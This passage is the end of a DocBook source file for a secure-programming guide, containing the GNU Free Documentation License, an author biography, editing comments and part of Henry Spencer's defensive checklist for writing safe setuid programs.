drawing editor, and that is suitable for input to text formatters or
|
||
for automatic translation to a variety of formats suitable for input
|
||
to text formatters. A copy made in an otherwise <link
|
||
linkend="fdl-transparent"> Transparent</link> file format whose markup
|
||
has been designed to thwart or discourage subsequent modification by
|
||
readers is not <link linkend="fdl-transparent">Transparent</link>. A
|
||
copy that is not <link linkend="fdl-transparent">"Transparent"</link>
|
||
is called "Opaque".
|
||
</para>
|
||
|
||
<para>
|
||
Examples of suitable formats for <link
|
||
linkend="fdl-transparent">Transparent</link> copies include plain
|
||
ASCII without markup, Texinfo input format, LaTeX input format, SGML
|
||
or XML using a publicly available DTD, and standard-conforming simple
|
||
HTML designed for human modification. Opaque formats include
|
||
PostScript, PDF, proprietary formats that can be read and edited only
|
||
by proprietary word processors, SGML or XML for which the DTD and/or
|
||
processing tools are not generally available, and the
|
||
machine-generated HTML produced by some word processors for output
|
||
purposes only.
|
||
</para>
|
||
|
||
<para id="fdl-title-page">
|
||
The <link linkend="fdl-title-page">"Title Page"</link> means, for a
|
||
printed book, the title page itself, plus such following pages as are
|
||
needed to hold, legibly, the material this License requires to appear
|
||
in the title page. For works in formats which do not have any title
|
||
page as such, <link linkend="fdl-title-page"> "Title Page"</link>
|
||
means the text near the most prominent appearance of the work's title,
|
||
preceding the beginning of the body of the text.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry id="fdl-section2">
|
||
<term>2. VERBATIM COPYING</term>
|
||
<listitem>
|
||
<para>
|
||
You may copy and distribute the <link
|
||
linkend="fdl-document">Document</link> in any medium, either
|
||
commercially or noncommercially, provided that this License, the
|
||
copyright notices, and the license notice saying this License applies
|
||
to the <link linkend="fdl-document">Document</link> are reproduced in
|
||
all copies, and that you add no other conditions whatsoever to those
|
||
of this License. You may not use technical measures to obstruct or
|
||
control the reading or further copying of the copies you make or
|
||
distribute. However, you may accept compensation in exchange for
|
||
copies. If you distribute a large enough number of copies you must
|
||
also follow the conditions in <link linkend="fdl-section3">section
|
||
3</link>.
|
||
</para>
|
||
|
||
<para>
|
||
You may also lend copies, under the same conditions stated above, and
|
||
you may publicly display copies.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry id="fdl-section3">
|
||
<term>3. COPYING IN QUANTITY</term>
|
||
<listitem>
|
||
<para>
|
||
If you publish printed copies of the <link
|
||
linkend="fdl-document">Document</link> numbering more than 100, and
|
||
the <link linkend="fdl-document">Document's</link> license notice
|
||
requires <link linkend="fdl-cover-texts">Cover Texts</link>, you must
|
||
enclose the copies in covers that carry, clearly and legibly, all
|
||
these <link linkend="fdl-cover-texts">Cover Texts</link>: Front-Cover
|
||
Texts on the front cover, and Back-Cover Texts on the back cover. Both
|
||
covers must also clearly and legibly identify you as the publisher of
|
||
these copies. The front cover must present the full title with all
|
||
words of the title equally prominent and visible. You may add other
|
||
material on the covers in addition. Copying with changes limited to
|
||
the covers, as long as they preserve the title of the <link
|
||
linkend="fdl-document">Document</link> and satisfy these conditions,
|
||
can be treated as verbatim copying in other respects.
|
||
</para>
|
||
|
||
<para>
|
||
If the required texts for either cover are too voluminous to fit
|
||
legibly, you should put the first ones listed (as many as fit
|
||
reasonably) on the actual cover, and continue the rest onto adjacent
|
||
pages.
|
||
</para>
|
||
|
||
<para>
|
||
If you publish or distribute <link
|
||
linkend="fdl-transparent">Opaque</link> copies of the <link
|
||
linkend="fdl-document">Document</link> numbering more than 100, you
|
||
must either include a machine-readable <link
|
||
linkend="fdl-transparent">Transparent</link> copy along with each
|
||
<link linkend="fdl-transparent">Opaque</link> copy, or state in or
|
||
with each <link linkend="fdl-transparent">Opaque</link> copy a
|
||
publicly-accessible computer-network location containing a complete
|
||
<link linkend="fdl-transparent"> Transparent</link> copy of the <link
|
||
linkend="fdl-document">Document</link>, free of added material, which
|
||
the general network-using public has access to download anonymously at
|
||
no charge using public-standard network protocols. If you use the
|
||
latter option, you must take reasonably prudent steps, when you begin
|
||
distribution of <link linkend="fdl-transparent">Opaque</link> copies
|
||
in quantity, to ensure that this <link
|
||
linkend="fdl-transparent">Transparent</link> copy will remain thus
|
||
accessible at the stated location until at least one year after the
|
||
last time you distribute an <link
|
||
linkend="fdl-transparent">Opaque</link> copy (directly or through your
|
||
agents or retailers) of that edition to the public.
|
||
</para>
|
||
|
||
<para>
|
||
It is requested, but not required, that you contact the authors of the
|
||
<link linkend="fdl-document">Document</link> well before
|
||
redistributing any large number of copies, to give them a chance to
|
||
provide you with an updated version of the <link
|
||
linkend="fdl-document">Document</link>.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry id="fdl-section4">
|
||
<term>4. MODIFICATIONS</term>
|
||
<listitem>
|
||
<para>
|
||
You may copy and distribute a <link linkend="fdl-modified">Modified
|
||
Version</link> of the <link linkend="fdl-document">Document</link>
|
||
under the conditions of sections <link linkend="fdl-section2">2</link>
|
||
and <link linkend="fdl-section3">3</link> above, provided that you
|
||
release the <link linkend="fdl-modified">Modified Version</link> under
|
||
precisely this License, with the <link linkend="fdl-modified">Modified
|
||
Version</link> filling the role of the <link
|
||
linkend="fdl-document">Document</link>, thus licensing distribution
|
||
and modification of the <link linkend="fdl-modified">Modified
|
||
Version</link> to whoever possesses a copy of it. In addition, you
|
||
must do these things in the <link linkend="fdl-modified">Modified
|
||
Version</link>:
|
||
</para>
|
||
|
||
<orderedlist numeration="upperalpha">
|
||
<listitem>
|
||
<para>
|
||
Use in the <link linkend="fdl-title-page">Title Page</link> (and
|
||
on the covers, if any) a title distinct from that of the <link
|
||
linkend="fdl-document">Document</link>, and from those of
|
||
previous versions (which should, if there were any, be listed in
|
||
the History section of the <link
|
||
linkend="fdl-document">Document</link>). You may use the same
|
||
title as a previous version if the original publisher of that
|
||
version gives permission.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
List on the <link linkend="fdl-title-page">Title Page</link>, as
|
||
authors, one or more persons or entities responsible for
|
||
authorship of the modifications in the <link
|
||
linkend="fdl-modified">Modified Version</link>, together with at
|
||
least five of the principal authors of the <link
|
||
linkend="fdl-document">Document</link> (all of its principal
|
||
authors, if it has less than five).
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
State on the <link linkend="fdl-title-page">Title Page</link>
|
||
the name of the publisher of the <link
|
||
linkend="fdl-modified">Modified Version</link>, as the
|
||
publisher.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Preserve all the copyright notices of the <link
|
||
linkend="fdl-document">Document</link>.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Add an appropriate copyright notice for your modifications
|
||
adjacent to the other copyright notices.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Include, immediately after the copyright notices, a license
|
||
notice giving the public permission to use the <link
|
||
linkend="fdl-modified">Modified Version</link> under the terms
|
||
of this License, in the form shown in the Addendum below.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Preserve in that license notice the full lists of <link
|
||
linkend="fdl-invariant">Invariant Sections</link> and required
|
||
<link linkend="fdl-cover-texts">Cover Texts</link> given in the
|
||
<link linkend="fdl-document">Document's</link> license notice.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Include an unaltered copy of this License.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Preserve the section entitled "History", and its title, and add
|
||
to it an item stating at least the title, year, new authors, and
|
||
publisher of the <link linkend="fdl-modified">Modified Version
|
||
</link>as given on the <link linkend="fdl-title-page">Title
|
||
Page</link>. If there is no section entitled "History" in the
|
||
<link linkend="fdl-document">Document</link>, create one stating
|
||
the title, year, authors, and publisher of the <link
|
||
linkend="fdl-document">Document</link> as given on its <link
|
||
linkend="fdl-title-page">Title Page</link>, then add an item
|
||
describing the <link linkend="fdl-modified">Modified
|
||
Version</link> as stated in the previous sentence.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Preserve the network location, if any, given in the <link
|
||
linkend="fdl-document">Document</link> for public access to a
|
||
<link linkend="fdl-transparent">Transparent</link> copy of the
|
||
<link linkend="fdl-document">Document</link>, and likewise the
|
||
network locations given in the <link
|
||
linkend="fdl-document">Document</link> for previous versions it
|
||
was based on. These may be placed in the "History" section. You
|
||
may omit a network location for a work that was published at
|
||
least four years before the <link
|
||
linkend="fdl-document">Document</link> itself, or if the
|
||
original publisher of the version it refers to gives permission.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
In any section entitled "Acknowledgements" or "Dedications",
|
||
preserve the section's title, and preserve in the section all
|
||
the substance and tone of each of the contributor
|
||
acknowledgements and/or dedications given therein.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Preserve all the <link linkend="fdl-invariant">Invariant
|
||
Sections</link> of the <link
|
||
linkend="fdl-document">Document</link>, unaltered in their text
|
||
and in their titles. Section numbers or the equivalent are not
|
||
considered part of the section titles.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Delete any section entitled "Endorsements". Such a section may
|
||
not be included in the <link linkend="fdl-modified">Modified
|
||
Version</link>.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Do not retitle any existing section as "Endorsements" or to
|
||
conflict in title with any <link
|
||
linkend="fdl-invariant">Invariant Section</link>.
|
||
</para>
|
||
</listitem>
|
||
</orderedlist>
|
||
|
||
<para>
|
||
If the <link linkend="fdl-modified">Modified Version</link> includes
|
||
new front-matter sections or appendices that qualify as <link
|
||
linkend="fdl-secondary">Secondary Sections</link> and contain no
|
||
material copied from the Document, you may at your option designate
|
||
some or all of these sections as invariant. To do this, add their
|
||
titles to the list of <link linkend="fdl-invariant">Invariant
|
||
Sections</link> in the <link linkend="fdl-modified">Modified
|
||
Version's</link> license notice. These titles must be distinct from
|
||
any other section titles.
|
||
</para>
|
||
|
||
<para>
|
||
You may add a section entitled "Endorsements", provided it contains
|
||
nothing but endorsements of your <link linkend="fdl-modified">Modified
|
||
Version</link> by various parties--for example, statements of peer
|
||
review or that the text has been approved by an organization as the
|
||
authoritative definition of a standard.
|
||
</para>
|
||
|
||
<para>
|
||
You may add a passage of up to five words as a <link
|
||
linkend="fdl-cover-texts">Front-Cover Text</link>, and a passage of up
|
||
to 25 words as a <link linkend="fdl-cover-texts">Back-Cover
|
||
Text</link>, to the end of the list of <link
|
||
linkend="fdl-cover-texts">Cover Texts</link> in the <link
|
||
linkend="fdl-modified">Modified Version</link>. Only one passage of
|
||
<link linkend="fdl-cover-texts">Front-Cover Text</link> and one of
|
||
<link linkend="fdl-cover-texts">Back-Cover Text</link> may be added by
|
||
(or through arrangements made by) any one entity. If the <link
|
||
linkend="fdl-document">Document</link> already includes a cover text
|
||
for the same cover, previously added by you or by arrangement made by
|
||
the same entity you are acting on behalf of, you may not add another;
|
||
but you may replace the old one, on explicit permission from the
|
||
previous publisher that added the old one.
|
||
</para>
|
||
|
||
<para>
|
||
The author(s) and publisher(s) of the <link
|
||
linkend="fdl-document">Document</link> do not by this License give
|
||
permission to use their names for publicity for or to assert or imply
|
||
endorsement of any <link linkend="fdl-modified">Modified Version
|
||
</link>.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry id="fdl-section5">
|
||
<term>5. COMBINING DOCUMENTS</term>
|
||
<listitem>
|
||
<para>
|
||
You may combine the <link linkend="fdl-document">Document</link> with
|
||
other documents released under this License, under the terms defined
|
||
in <link linkend="fdl-section4">section 4</link> above for modified
|
||
versions, provided that you include in the combination all of the
|
||
<link linkend="fdl-invariant">Invariant Sections</link> of all of the
|
||
original documents, unmodified, and list them all as <link
|
||
linkend="fdl-invariant">Invariant Sections</link> of your combined
|
||
work in its license notice.
|
||
</para>
|
||
|
||
<para>
|
||
The combined work need only contain one copy of this License, and
|
||
multiple identical <link linkend="fdl-invariant">Invariant
|
||
Sections</link> may be replaced with a single copy. If there are
|
||
multiple <link linkend="fdl-invariant">Invariant Sections</link> with
|
||
the same name but different contents, make the title of each such
|
||
section unique by adding at the end of it, in parentheses, the name of
|
||
the original author or publisher of that section if known, or else a
|
||
unique number. Make the same adjustment to the section titles in the
|
||
list of <link linkend="fdl-invariant">Invariant Sections</link> in the
|
||
license notice of the combined work.
|
||
</para>
|
||
|
||
<para>
|
||
In the combination, you must combine any sections entitled "History"
|
||
in the various original documents, forming one section entitled
|
||
"History"; likewise combine any sections entitled "Acknowledgements",
|
||
and any sections entitled "Dedications". You must delete all sections
|
||
entitled "Endorsements."
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry id="fdl-section6">
|
||
<term>6. COLLECTIONS OF DOCUMENTS</term>
|
||
<listitem>
|
||
<para>
|
||
You may make a collection consisting of the <link
|
||
linkend="fdl-document">Document</link> and other documents released
|
||
under this License, and replace the individual copies of this License
|
||
in the various documents with a single copy that is included in the
|
||
collection, provided that you follow the rules of this License for
|
||
verbatim copying of each of the documents in all other respects.
|
||
</para>
|
||
|
||
<para>
|
||
You may extract a single document from such a collection, and
|
||
distribute it individually under this License, provided you insert a
|
||
copy of this License into the extracted document, and follow this
|
||
License in all other respects regarding verbatim copying of that
|
||
document.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry id="fdl-section7">
|
||
<term>7. AGGREGATION WITH INDEPENDENT WORKS</term>
|
||
<listitem>
|
||
<para>
|
||
A compilation of the <link linkend="fdl-document">Document</link> or
|
||
its derivatives with other separate and independent documents or
|
||
works, in or on a volume of a storage or distribution medium, does not
|
||
as a whole count as a <link linkend="fdl-modified">Modified
|
||
Version</link> of the <link linkend="fdl-document">Document</link>,
|
||
provided no compilation copyright is claimed for the compilation.
|
||
Such a compilation is called an "aggregate", and this License does not
|
||
apply to the other self-contained works thus compiled with the <link
|
||
linkend="fdl-document">Document</link>, on account of their being
|
||
thus compiled, if they are not themselves derivative works of the
|
||
<link linkend="fdl-document">Document</link>. If the <link
|
||
linkend="fdl-cover-texts">Cover Text</link> requirement of <link
|
||
linkend="fdl-section3">section 3</link> is applicable to these copies
|
||
of the <link linkend="fdl-document">Document</link>, then if the <link
|
||
linkend="fdl-document">Document</link> is less than one quarter of the
|
||
entire aggregate, the <link linkend="fdl-document">Document's</link>
|
||
<link linkend="fdl-cover-texts">Cover Texts</link> may be placed on
|
||
covers that surround only the <link
|
||
linkend="fdl-document">Document</link> within the aggregate. Otherwise
|
||
they must appear on covers around the whole aggregate.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry id="fdl-section8">
|
||
<term>8. TRANSLATION</term>
|
||
<listitem>
|
||
<para>
|
||
Translation is considered a kind of modification, so you may
|
||
distribute translations of the <link
|
||
linkend="fdl-document">Document</link> under the terms of <link
|
||
linkend="fdl-section4">section 4</link>. Replacing <link
|
||
linkend="fdl-invariant">Invariant Sections</link> with translations
|
||
requires special permission from their copyright holders, but you may
|
||
include translations of some or all <link
|
||
linkend="fdl-invariant">Invariant Sections</link> in addition to the
|
||
original versions of these <link linkend="fdl-invariant">Invariant
|
||
Sections</link>. You may include a translation of this License
|
||
provided that you also include the original English version of this
|
||
License. In case of a disagreement between the translation and the
|
||
original English version of this License, the original English version
|
||
will prevail.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry id="fdl-section9">
|
||
<term>9. TERMINATION</term>
|
||
<listitem>
|
||
<para>
|
||
You may not copy, modify, sublicense, or distribute the <link
|
||
linkend="fdl-document">Document</link> except as expressly provided
|
||
for under this License. Any other attempt to copy, modify, sublicense
|
||
or distribute the <link linkend="fdl-document">Document</link> is
|
||
void, and will automatically terminate your rights under this
|
||
License. However, parties who have received copies, or rights, from
|
||
you under this License will not have their licenses terminated so long
|
||
as such parties remain in full compliance.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry id="fdl-section10">
|
||
<term>10. FUTURE REVISIONS OF THIS LICENSE</term>
|
||
<listitem>
|
||
<para>
|
||
The <ulink type="http" url="http://www.gnu.org/fsf/fsf.html">Free
|
||
Software Foundation</ulink> may publish new, revised versions of the
|
||
GNU Free Documentation License from time to time. Such new versions
|
||
will be similar in spirit to the present version, but may differ in
|
||
detail to address new problems or concerns. See <ulink type="http"
|
||
url="http://www.gnu.org/copyleft">http://www.gnu.org/copyleft/</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
Each version of the License is given a distinguishing version
|
||
number. If the <link linkend="fdl-document">Document</link> specifies
|
||
that a particular numbered version of this License "or any later
|
||
version" applies to it, you have the option of following the terms and
|
||
conditions either of that specified version or of any later version
|
||
that has been published (not as a draft) by the Free Software
|
||
Foundation. If the <link linkend="fdl-document">Document</link> does
|
||
not specify a version number of this License, you may choose any
|
||
version ever published (not as a draft) by the Free Software
|
||
Foundation.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry id="fdl-using">
|
||
<term>Addendum</term>
|
||
<listitem>
|
||
<para>
|
||
To use this License in a document you have written, include a copy of
|
||
the License in the document and put the following copyright and
|
||
license notices just after the title page:
|
||
</para>
|
||
|
||
<para>
|
||
Copyright © YEAR YOUR NAME.
|
||
</para>
|
||
|
||
<para>
|
||
Permission is granted to copy, distribute and/or modify this document
|
||
under the terms of the GNU Free Documentation License, Version 1.1 or
|
||
any later version published by the Free Software Foundation; with the
|
||
<link linkend="fdl-invariant">Invariant Sections</link> being LIST
|
||
THEIR TITLES, with the <link linkend="fdl-cover-texts">Front-Cover
|
||
Texts</link> being LIST, and with the <link
|
||
linkend="fdl-cover-texts">Back-Cover Texts</link> being LIST. A copy
|
||
of the license is included in the section entitled <quote>GNU Free
|
||
Documentation License</quote>.
|
||
</para>
|
||
|
||
<para>
|
||
If you have no <link linkend="fdl-invariant">Invariant
|
||
Sections</link>, write "with no Invariant Sections" instead of saying
|
||
which ones are invariant. If you have no <link
|
||
linkend="fdl-cover-texts">Front-Cover Texts</link>, write "no
|
||
Front-Cover Texts" instead of "Front-Cover Texts being LIST"; likewise
|
||
for <link linkend="fdl-cover-texts">Back-Cover Texts</link>.
|
||
</para>
|
||
|
||
<para>
|
||
If your document contains nontrivial examples of program code, we
|
||
recommend releasing these examples in parallel under your choice of
|
||
free software license, such as the <ulink type="http"
|
||
url="http://www.gnu.org/copyleft/gpl.html">GNU General Public
|
||
License</ulink>, to permit their use in free software.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
</variablelist>
|
||
</appendix>
|
||
|
||
<appendix id="endorsements">
|
||
<title>Endorsements</title>
|
||
<para>
|
||
This version of the document is endorsed by the
|
||
original author, David A. Wheeler, as a document that
|
||
should improve the security of programs,
|
||
when applied correctly.
|
||
Note that no book, including this one, can guarantee that a developer
|
||
who follows its guidelines will produce perfectly secure software.
|
||
Modifications (including translations) must remove this appendix
|
||
per the license agreement included above.
|
||
</para>
|
||
</appendix>
|
||
|
||
|
||
<appendix id="about-author">
|
||
<title>About the Author</title>
|
||
|
||
<mediaobject>
|
||
<imageobject>
|
||
<imagedata fileref="images/dwheeler2003b.jpg" format="jpg">
|
||
</imageobject>
|
||
<caption>
|
||
<para>David A. Wheeler</para>
|
||
</caption>
|
||
</mediaobject>
|
||
|
||
<para>
|
||
David A. Wheeler is an expert in computer security and
has long specialized in development techniques for large and
high-risk software systems.
He has been involved in software development
since the mid-1970s,
and with Unix and computer security since the early 1980s.
His areas of knowledge include computer security,
software safety, vulnerability analysis, inspections, Internet technologies,
software-related standards (including POSIX),
real-time software development techniques,
and numerous computer languages
(including Ada, C, C++, Perl, Python, and Java).
|
||
</para>
|
||
|
||
<para>
|
||
Mr. Wheeler is co-author and lead editor of the IEEE book
|
||
<emphasis>Software Inspection: An Industry Best Practice</emphasis>,
|
||
author of the book
|
||
<emphasis>Ada95: The Lovelace Tutorial</emphasis>,
|
||
and co-author of the
|
||
<emphasis>GNOME User's Guide</emphasis>.
|
||
He is also the author of many smaller papers and articles, including the
|
||
Linux <emphasis>Program Library HOWTO</emphasis>.
|
||
</para>
|
||
|
||
<para>
|
||
Mr. Wheeler hopes that making this document available will help other
developers make their software more secure.
You can reach him by email at dwheeler@dwheeler.com (no spam please),
and you can also visit his web site at
<ulink url="http://www.dwheeler.com">http://www.dwheeler.com</ulink>.
|
||
</para>
|
||
</appendix>
|
||
|
||
|
||
<!--Miscellaneous quotes:
|
||
Do not deprive the alien or the fatherless of justice,
|
||
or take the cloak of the widow as a pledge.
|
||
Deuteronomy 24:17
|
||
|
||
|
||
Words from a wise man's mouth are gracious, but a fool is consumed
|
||
by his own lips. At the beginning his words are folly;
|
||
at the end they are wicked madness
|
||
Ecclesiastes 10:12-13
|
||
|
||
|
||
|
||
I took the deed of purchase - the sealed copy containing the
|
||
terms and conditions, as well as the unsealed copy -
|
||
Jeremiah 32:11 (English-NIV)
|
||
|
||
|
||
Esther had not revealed her nationality and family background,
|
||
because Mordecai had forbidden her to do so.
|
||
Esther 2:10
|
||
|
||
|
||
When the righteous thrive, the people rejoice;
|
||
when the wicked rule, the people groan.
|
||
Proverbs 29:2
|
||
|
||
When words are many, sin is not absent, but he who holds his tongue is wise.
|
||
Proverbs 10:19
|
||
|
||
|
||
Reckless words pierce like a sword,
|
||
but the tongue of the wise brings healing.
|
||
Proverbs 12:18
|
||
|
||
|
||
"Go and inquire of the LORD for me and for the people and for all Judah
|
||
about what is written in this book that has been found.
|
||
Great is the LORD's anger that burns against us because our fathers
|
||
have not obeyed the words of this book; they have not acted in
|
||
accordance with all that is written there concerning us."
|
||
2 Kings 22:13
|
||
|
||
Only be careful, and watch yourselves closely so that you do not forget
|
||
the things your eyes have seen or let them slip from your heart
|
||
as long as you live. Teach them to your children and to their
|
||
children after them.
|
||
Deuteronomy 4:9
|
||
|
||
You prepare a table before me
|
||
in the presence of my enemies.
|
||
You anoint my head with oil;
|
||
my cup overflows. Psalm 23:5 (NIV)
|
||
|
||
"An enemy will overrun the land; he will pull down your strongholds and
|
||
plunder your fortresses."
|
||
Amos 3:11
|
||
|
||
But my brothers are as undependable as intermittent streams,
|
||
as the streams that overflow
|
||
Job 6:15
|
||
|
||
???: http://soledad.cs.ucdavis.edu/
|
||
describes Linux BSM, an auditing project.
|
||
|
||
???: Could add a discussion of legal issues and requirements,
|
||
U.S. and internationally.
|
||
|
||
??? Discuss formal proofs.
|
||
|
||
|
||
Per http://www.tldp.org/LDP/LDP-Author-Guide/images.html,
|
||
the template for images is:
|
||
<figure>
|
||
<title>LyX screen shot</title>
|
||
<mediaobject>
|
||
<imageobject>
|
||
<imagedata fileref="lyx_screenshot.eps" format="eps">
|
||
</imageobject>
|
||
<imageobject>
|
||
<imagedata fileref="lyx_screenshot.jpg" format="jpg">
|
||
</imageobject>
|
||
<textobject>
|
||
<phrase>Screen shot of the LyX document processing program</phrase>
|
||
</textobject>
|
||
</mediaobject>
|
||
</figure>
|
||
|
||
-->
|
||
|
||
<!--
|
||
Here is Henry Spencer's 1987 man page on writing setuid programs,
|
||
reposted in the Bugtraq of April 25, 2002; sometime I intend to
|
||
go back through this and make sure I haven't missed anything:
|
||
|
||
|
||
...TH SETUID 7 local
|
||
...DA 21 Feb 1987
|
||
...SH NAME
|
||
setuid \- checklist for security of setuid programs
|
||
...SH DESCRIPTION
|
||
Writing a secure setuid (or setgid) program is tricky.
|
||
There are a number of possible ways of subverting such a program.
|
||
The most conspicuous security holes occur when a setuid program is
|
||
not sufficiently careful to avoid giving away access to resources
|
||
it legitimately has the use of.
|
||
Most of the other attacks are basically a matter of altering the program's
|
||
environment in unexpected ways and hoping it will fail in some
|
||
security-breaching manner.
|
||
There are generally three categories of environment manipulation:
|
||
supplying a legal but unexpected environment that may cause the
|
||
program to directly do something insecure,
|
||
arranging for error conditions that the program may not handle correctly,
|
||
and the specialized subcategory of giving the program inadequate
|
||
resources in hopes that it won't respond properly.
|
||
...PP
|
||
The following are general considerations of security when writing
|
||
a setuid program.
|
||
...de P
|
||
...nr x \\w'\(sq'u+1n
|
||
...TP \\nxu
|
||
\(sq
|
||
....
|
||
...P
|
||
The program should run with the weakest userid possible, preferably
|
||
one used only by itself.
|
||
A security hole in a setuid program running with a highly-privileged
|
||
userid can compromise an entire system.
|
||
Security-critical programs like
|
||
...IR passwd (1)
|
||
should always have private userids, to minimize possible damage
|
||
from penetrations elsewhere.
|
||
...P
|
||
The result of
|
||
...I getlogin
|
||
or
|
||
...I ttyname
|
||
may be wrong if the descriptors have been meddled with.
|
||
There is
|
||
...I no
|
||
foolproof way to determine the controlling terminal
|
||
or the login name (as opposed to uid) on V7.
|
||
...P
|
||
On some systems (not ours), the setuid bit may not be honored if
|
||
the program is run by
|
||
...IR root ,
|
||
so the program may find itself running as
|
||
...IR root .
|
||
...P
|
||
Programs that attempt to use
|
||
...I creat
|
||
for locking can foul up when run by
|
||
...IR root ;
|
||
use of
|
||
...I link
|
||
is preferred when implementing locking.
|
||
Using
|
||
...I chmod
|
||
for locking is an obvious disaster.
|
||
...P
|
||
Breaking an existing lock is very dangerous; the breakdown of a locking
|
||
protocol may be symptomatic of far worse problems.
|
||
Doing so on the basis of the lock being `old' is sometimes necessary,
|
||
but programs can run for surprising lengths of time on heavily-loaded
|
||
systems.
|
||
...P
|
||
Care must be taken that user requests for i/o are checked for
|
||
permissions using the user's permissions, not the program's.
|
||
Use of
|
||
...I access
|
||
is recommended.
|
||
...P
|
||
Programs executed at user request (e.g. shell escapes) must
|
||
not receive the setuid program's permissions;
|
||
use of daughter processes and
|
||
...I setuid(getuid())
|
||
plus
|
||
...I setgid(getgid())
|
||
after
|
||
...I fork
|
||
but before
|
||
...I exec
|
||
is vital.
|
||
...P
|
||
Similarly, programs executed at user request must not receive other
|
||
sensitive resources, notably file descriptors.
|
||
Use of
|
||
...IR closeall (3)
|
||
or close-on-exec arrangements,
|
||
on systems which have them,
|
||
is recommended.
|
||
...P
|
||
Programs activated by one user but handling traffic on behalf of
|
||
others (e.g. daemons) should avoid doing
|
||
...IR setuid(getuid())
|
||
or
|
||
...IR setgid(getgid()) ,
|
||
since the original invoker's identity is almost certainly inappropriate.
|
||
On systems which permit it, use of
|
||
...I setuid(geteuid())
|
||
and
|
||
...I setgid(getegid())
|
||
is recommended when performing work on behalf of the system as
|
||
opposed to a specific user.
|
||
...P
|
||
There are inherent permission problems when a setuid program executes
|
||
another setuid program,
|
||
since the permissions are not additive.
|
||
Care should be taken that created files are not owned by the wrong person.
|
||
Use of
|
||
...I setuid(geteuid())
|
||
and its gid counterpart can help, if the system allows them.
|
||
...P
|
||
Care should be taken that newly-created files do not have the wrong
|
||
permission or ownership even momentarily.
|
||
Permissions should be arranged by using
|
||
...I umask
|
||
in advance, rather than by creating the file wide-open and then using
|
||
...IR chmod .
|
||
Ownership can get sticky due to the limitations of the setuid concept,
|
||
although using a daughter process connected by a pipe can help.
|
||
...P
|
||
Setuid programs should be especially careful about error checking,
|
||
and the normal response to a strange situation should be termination,
|
||
rather than an attempt to carry on.
|
||
...PP
|
||
The following are ways in which the program may be induced to carelessly
|
||
give away its special privileges.
|
||
...P
|
||
The directory the program is started in, or directories it may
|
||
plausibly
|
||
...I chdir
|
||
to, may contain programs with the same names as system programs,
|
||
placed there in hopes that the program will activate a shell with
|
||
a permissive
|
||
...B PATH
|
||
setting.
|
||
...B PATH
|
||
should \fIalways\fR be standardized before invoking a shell
|
||
(either directly or via
|
||
...I popen
|
||
or
|
||
...IR execvp/execlp ).
|
||
...P
|
||
Similarly, a bizarre
|
||
...B IFS
|
||
setting may alter the interpretation of a shell command in really
|
||
strange ways, possibly causing a user-supplied program to be invoked.
|
||
...B IFS
|
||
too should always be standardized before invoking a shell.
|
||
(Our shell does this automatically.)
|
||
...P
|
||
Environment variables in general cannot be trusted.
|
||
Their contents should never be taken for granted.
|
||
...P
|
||
Setuid shell files (on systems which implement such) simply cannot
|
||
cope adequately with some of these problems.
|
||
They also have some nasty problems like trying to run a
|
||
...I \&.profile
|
||
when run under a suitable name.
|
||
They are terminally insecure, and must be avoided.
|
||
...P
|
||
Relying on the contents of files placed in publically-writeable
|
||
directories, such as
|
||
...IR /tmp ,
|
||
is a nearly-incurable security problem.
|
||
Setuid programs should avoid using
|
||
...I /tmp
|
||
entirely, if humanly possible.
|
||
The sticky-directories modification (sticky bit on for a directory means
|
||
only owner of a file can remove it) (we have this feature) helps,
|
||
but is not a complete solution.
|
||
...P
|
||
A related problem is that
|
||
spool directories, holding information that the program will trust
|
||
later, must never be publically writeable even if the files in the
|
||
directory are protected.
|
||
Among other sinister manipulations that can be performed, note that
|
||
on many Unixes (not ours), a core dump of a setuid program is owned
|
||
by the program's owner and not by the user running it.
|
||
...PP
|
||
The following are unusual but possible error conditions that the
|
||
program should cope with properly (resource-exhaustion questions
|
||
are considered separately, see below).
|
||
...P
|
||
The value of
|
||
...I argc
|
||
might be 0.
|
||
...P
|
||
The setting of the
|
||
...I umask
|
||
might not be sensible.
|
||
In any case, it should be standardized when creating files
|
||
not intended to be owned by the user.
|
||
...P
|
||
One or more of the standard descriptors might be closed, so that
|
||
an opened file might get (say) descriptor 1, causing chaos if the
|
||
program tries to do a
|
||
...IR printf .
|
||
...P
|
||
The current directory (or any of its parents)
|
||
may be unreadable and unsearchable.
|
||
On many systems
|
||
...IR pwd (1)
|
||
does not run setuid-root,
|
||
so it can fail under such conditions.
|
||
...P
|
||
Descriptors shared by other processes (i.e., any that are open
|
||
on startup) may be manipulated in strange ways by said processes.
...P
